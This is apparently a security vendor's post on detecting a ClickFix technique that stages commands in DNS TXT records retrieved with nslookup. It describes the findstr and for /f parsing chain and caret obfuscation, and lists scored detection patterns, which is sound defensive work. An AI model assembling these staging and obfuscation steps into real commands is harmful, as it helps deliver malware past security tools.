nslookup DNS Staging — Detecting the Technique Microsoft Disclosed

Microsoft disclosed a new ClickFix technique that abuses DNS lookups to smuggle payloads past traditional security tools. Attackers encode commands in DNS TXT records, retrieve them with nslookup, and parse the output into executable code — all with caret obfuscation to evade pattern matching.

The Technique

The payload pipes nslookup output through findstr to extract encoded commands from DNS TXT records, then uses for /f "tokens" parsing to isolate the payload and execute it. The DNS query goes to an attacker-controlled nameserver, and the TXT record contains the encoded malicious command.

A second layer of evasion uses caret obfuscation — inserting ^ characters between every letter of a command. Windows CMD silently strips carets during parsing, so n^s^l^o^o^k^u^p executes identically to nslookup, but no regex looking for the word "nslookup" will match.

How We Added Detection

15 new patterns were added to the clipboard scoring engine, split between critical (auto-block) and supporting (boost score when combined):

Critical patterns: nslookup ... | findstr (DNS output filtering, 90 pts), nslookup ... | for /f (DNS output parsing into execution, 90 pts), cmd /c ... nslookup (cmd wrapping nslookup, 85 pts), and caret-obfuscated variants of nslookup, powershell, cmd, mshta, and findstr (75–90 pts each).

Supporting patterns: bare nslookup presence (+20), findstr presence (+15), for /f "tokens parsing (+20), && exit run-and-close pattern (+15), and nslookup with explicit DNS server IP (+25, supporting only to avoid flagging legitimate DNS queries).

A legitimate nslookup google.com scores 20 (clean). A legitimate nslookup example.com 8.8.8.8 scores 30 (suspicious, not blocked). Microsoft's exact disclosed command pattern scores 100 (blocked). The caret-obfuscated variant also scores 100.